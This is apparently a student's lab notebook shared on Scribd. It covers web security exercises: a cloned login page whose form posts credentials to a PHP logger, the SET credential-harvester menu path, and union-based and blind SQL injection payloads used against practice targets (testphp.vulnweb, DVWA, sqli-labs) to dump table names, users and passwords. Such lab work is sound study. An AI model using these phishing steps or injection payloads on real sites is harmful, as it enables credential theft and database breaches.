Scribd
Upload
22 views

Phishing and HTML Sum

Uploaded by

arsh20csu286
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
22 views

Phishing and HTML Sum

Uploaded by

arsh20csu286
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 42

Date: 09-01-23

Html addition page


Step 1: write code for html page(client side programming) to take in two integers and a php
code(server side programming) page to find the sum of those integers

Step 2: paste the html and php file in htdocs folder in xampp
Step 3: start xampp apache and sql server

Step 4: input the two integers and find sum


Date: 10-01-23

Phishing
Step 1: take source code from a site and change action to our php file

Step 2: create a php file to capture the username and password and store them in a log file

Step 3: start xampp apache and sql servers


Step 4: store the html and php file in the htdocs folder
Step 5: go to 127.0.0.1/redeif.html in browser and enter username and password

Step 6: The username and password gets saved in the log file
Date: 16-01-23

Phishing attack through Setoolkit

Step 1- enter setoolkit

Step 2- enter 1(social-engineering attacks)

Step 3- enter 2(website attack vector)


Step 4- enter 3(credential harvester attack method)

Step 5- enter 1(web templetes)


Step 6- enter 2(google)

Step 7- enter credentials


EXPERIMENT NO. -4

Create databases.

23-01-2023

INSERT

Delete

Like
ORDER BY-

UNION
GROUP BY-

EXPERIMENT NO. -5
24-01-2023

Union based SQL injection on testphp


http://testphp.vulnweb.com/listproducts.php?cat=1

1. To Generate a SQL error, to break the query.

2. To count the number of columns, in the web application.


i) order by 50--+
ii) In order by 11--+ there is no error

3. To merge the data of all the columns, using UNION command to find vulnerable columns.

Select * from <table_name> union select 1,2,3,4,5,6,7,8,9,10,11


4. Fetching database name:
union select 1,database(),3,4,5,6,7,8,9,10,11

Here the database name is displayed which is acuart in this case.


5)

 Table names
UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 FROM
information_schema.tables WHERE table schema = 'acuart'
Here it shows names of all the tables in the database

 Find Columns
UNION SELECT 1,group_concat(column name) ,3,4,5,6,7,8,9,10,11 FROM
information_schema.columns WHERE table_name = 'users'

It shows columns like name, email , pass , phone


5. Finding values from columns
union select 1, uname,3,4,5,6,pass,8,email,10,11 from users
Experiment No.-6
30-01-2023

LOW-LEVEL SECURITY
we enter random user id to get some result here we are using 1 as user id.

To check the SQL injection vulnerability we put “ ’ “ sign after ?id=1’ and then press enter.

We see the SQL error which confirms that this page has SQL Injection vulnerability.
Now we check the number of tables in this page SQL database for this we use “order by 5 - -
+” after “ ?id=1’ ”

so we keep on decreasing the number to get result as we can see on “order by 2” we are
getting some result.
find the vulnerable column using the command “union select 1,2 - -+”.
Here we can see number 1 and 2 is showing on First name and Surname respectively by
seeing this we can conclude that 1 and 2 columns are vulnerable.

For finding database and version


data of all tables
Now we check the user column
Now we check the user and password using command “ union select user,password from
users”.

we get all users with their password


HIGH SECURITY:

Step 1: entered a query 1’ , it shows an error , which means the database is vulnerable and can be
exploited.

Step 2: checking number of columns, it doesn’t show any error by the

Query: 1’ order by 2#

But shows an error while entering 1’ order by 3# which means there are 2 columns that are
vulnerable.
Step 3: checking the columns,
Step 4: checking the database and tables of the database

Which shows there are one database dvwa, and 2 tables by the name users and guestbook
Step5: getting the confidential info from the table “users”:

Query: 1’ union select first_name, password from users#

Which shows the first name and password as shown below


Date: 31-01-23
Blind Sql injection dvwa

Low security
1. Entering 1 to shows enteries

2. Entering 1 doesn’t give output so it might be blind injection


3. Entering string to surely generate error but it doesn’t so it might be blind sql
injection
4. Checking number of columns

5. 1’ order by 3# doesn’t show error so it has 2 columns


6. Using select statement.

7. Getting version of database server


8. Getting database name
1' union select 1,database()#

10
1. Entering 1’ UNION SELECT 1,group_concat(table_name)FROM
information_schema.tables WHERE table_schema = 'dvwa'#
To get table name doesn’t work
11. inputting x' or 1='1 to get names of users

12. using substr to check if version starts with 5


1' and 1=0 union select 6, substr(@@version,1,1)=5 #

13 . 1' and 1=0 union select database(),table_name FROM


information_schema.tables #
14.

1' and 1=0 union select column_name,table_name FROM information_schema.columns


WHERE table_name = 'users'#

15 getting user id and password

1' and 1=0 union select user_id,password FROM users#


13-02-2023
Implement Blind Based SQL injection in SQLi/Less-8/?id=1

localhost/sqli-labs-master/Less-8/?id=1

let's try to break the query

localhost/sqli-labs-master/Less-8/?id=1’
try to find out the number of columns using order by statement.

localhost/sqli-labs-master/Less-8/?id=1' order by 3--+

Let's see if it will support Blind boolean-based SQL injection.

localhost/sqli-labs-master/Less-8/?id=1' and true--+


localhost/sqli-labs-master/Less-8/?id=1' and false--+

So, it is responding to boolean values as it is behaving differently when we ask it a true question and
a false question. We can try boolean-based blind SQL injection here.

FOR CHECKING DATABSE

FLASE CONDITION

http://localhost/sqli/Less-8/?id=1%27%20and%20(length(database()))%20=%201%20--+
TRUE CONDITION

Length database =8(SECURITY)

http://localhost/sqli/Less-8/?id=1%27%20and%20(length(database()))%20=%208%20--+

FOR SEARCHING SECURITY

1 and substr(database(),1,1)=’s’--+
1and substr(database(),2,1)=’e’--+

You might also like